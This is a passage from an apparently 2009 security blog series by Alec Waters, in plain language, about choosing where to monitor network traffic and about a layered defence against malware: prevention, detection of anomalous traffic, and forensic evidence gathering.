So, what has this got to do with strategic points and network security? It’s all to do with visibility, in terms of the quantity and type of traffic you want to observe.

Our school was on a main road, so we had a fair sample set to show for our twenty minutes’ worth of observations. If our school was instead next to a motorway, our sample set would have been huge (and possibly beyond the ability of a ten year old to accurately collect with a pencil and paper). If the school was in a cul-de-sac, we’d have hardly seen anything at all. So, if we want a large sample set the motorway is probably the best choice, albeit with the risk that we won’t be able to record everything we see.

On the other hand, the type of traffic may be more important to us than the quantity. If we want to observe trucks hauling huge loads, the motorway is the best place to look. If we’re interested in local bus services, our school’s main road might fit the bill. If we want to know about people’s milk deliveries, then the cul-de-sac would be a more fruitful place to conduct your sampling.

Coming back to network security, we have already established that we want to look at what is going on on the network; the next step is to pick one or more strategic points where we can do the looking. This will depend entirely on what your own infrastructure looks like, and what it is you’re hoping to see.

For the purposes of our baby steps, we’ll take the simple example of a small office. It has a dozen or so workstations connected via a switch, a single server (also on the switch), and a router that connects the whole lot to the Internet. We have already established that there is Badness on the Internet, and that we should watch for it. Given this objective, a suitable strategic point to monitor would be the point where the switch plugs into the router. All traffic either to or from the Internet will cross this point – if Badness is getting in or out, this is the route it has to take and, with a bit of luck, we’ll catch it in the act.

(I should emphasise at this point that monitoring our little office’s border with the Internet will not tell us anything about the conversations that the workstations and the server have between themselves – we’ll only see traffic that involves the Internet. If you’re interested in “local” traffic, you’ll need to conduct your monitoring elsewhere on your network, possibly at more than one location).

Having picked the place to do our monitoring, we now need to decide how we’re actually going to do this. Clearly, a ten year old with a pencil isn’t going to cut it. Perhaps there’s some technical marvel that can help us out? Stay tuned!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Baby steps

Posted in Why watch the wire? on 7 May, 2009 by Alec Waters

Referring back to my initial post, I said:

“I believe that the network itself (remembering my specific interpretation of the word “network”) is a great and often untapped source of security information”

Why do I think this, and what does it all boil down to at the end of the day?

Well, the “why” is based on the following rash assumptions:

  • Rash assumption #1 – “Badness” exists on the Internet (by “Badness” I’m talking about threats including viruses, trojans, bots and other such malware)
  • Rash assumption #2 – If the Badness reaches your computer, the most likely (but far from only) means by which it got there is via the network. It could have come in via an email, or a drive-by download, or via a peer-to-peer filesharing application – at this point in the discussion, the precise infection vector is unimportant. I just want to stress the fact that having a network connection provides a potential way in for Badness
  • Rash assumption #3 – Once present on your computer, the Badness will use the network in some way, either to receive a list of Evil Tasks from the Baddies, or to send the Baddies your banking credentials, or to perpetrate some other naughtiness.

Hopefully none of these assumptions can be reasonably refuted!

The common theme amongst these assumptions is the network itself. By connecting yourself to the Internet, you’re tapping into a vast pool of Badness, all of which wants to make its way onto your computer. Once there, the byproducts of the Badness will leave your computer via the same route – the network. It therefore follows that it ought to be productive to monitor the traffic crossing the network, and look out for signs of Badness.

Still with me?

Given the existence of the Badness, and the potential route it has to get onto your computer, what can we do about it? We clearly need some defences here. A three-layered approach might be to strive to achieve the following:

  1. Stop the Badness in its tracks. This is the ideal situation, and can be addressed with preventative measures such as:
    • Network- and host-based firewalls
    • Network Intrusion Prevention Sensors (IPS, actually a specialised class of firewall)
    • Email firewalls that scan messages for Badness well before the message actually reaches your computer
    • Network-based URL filters or proxies that intercept your web requests and stop you from fetching anything that is known to be Bad
    • Anti-virus software
    • Keeping the software on your computer patched in a timely fashion

    However, sooner or later, one or more of these will let you down and the Badness will get to your computer. So, at some point or another, we’ll need to fall back to the second line, which is to:

  2. Detect the Badness in a timely fashion. If we can’t stop the Badness, at least give us a chance to detect the Badness so that we can act before something really catastrophic goes down. We have to watch the network like a hawk, not just for the alerts raised by the preventative measures listed above, but for much more subtle things. We’re interested in anything anomalous, like:
    • Traffic at strange times of the day
    • Traffic on strange ports
    • Traffic to or from strange destinations
    • Unexpected traffic volumes or per-flow packet counts

    Your preventative measures are unlikely to report on indicators like this. Given the vagueness of what actually defines “anomalous” in your own context, it is pretty much a given that it is a person (not a machine) that makes this determination.

    Finally, we have to cover the case where Badness has got in undetected, and has wrought whatever carnage and mayhem its creator had in mind. In short, we need to:

  3. Gather enough forensic information to work out exactly what has happened, after you’ve found out about your own security breach in either the popular press or the legal papers that have just been served upon you. Take the relatively benign example where some rogue anti-virus software is popping up on your computer, telling you there are zillions of problems, and that it can fix them all (for a price!). We need to be able to determine:
    • Where the Badness came from
    • If anything else got downloaded along with the rogue anti-virus software
    • If there have been any unexpected network connections from the suspect machine

    Now, we can’t readily ask these questions of the infected machine. If the infection has been thorough enough, your computer will lie to you. It will tell you everything is OK, that there are no strange processes running, and that there is definitely no unusual network activity.

The only way to provide for all of this is to make use of the network itself. We need to be able to extract information from strategic points that will tell us what is going on now and also what happened at half past four last Tuesday afternoon. We need to be able to mine this information for usable snippets of intelligence, expressed in terms of low-level things like IP addresses and ports all the way through to higher-level things like URLs visited and emails sent and received. With this information at our fingertips, it becomes feasible to attempt to “Detect the Badness in a timely fashion” and to “Gather enough forensic information to work out exactly what has happened”.

So, how do we do all of this? That’s a topic for next time – stay tuned.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk
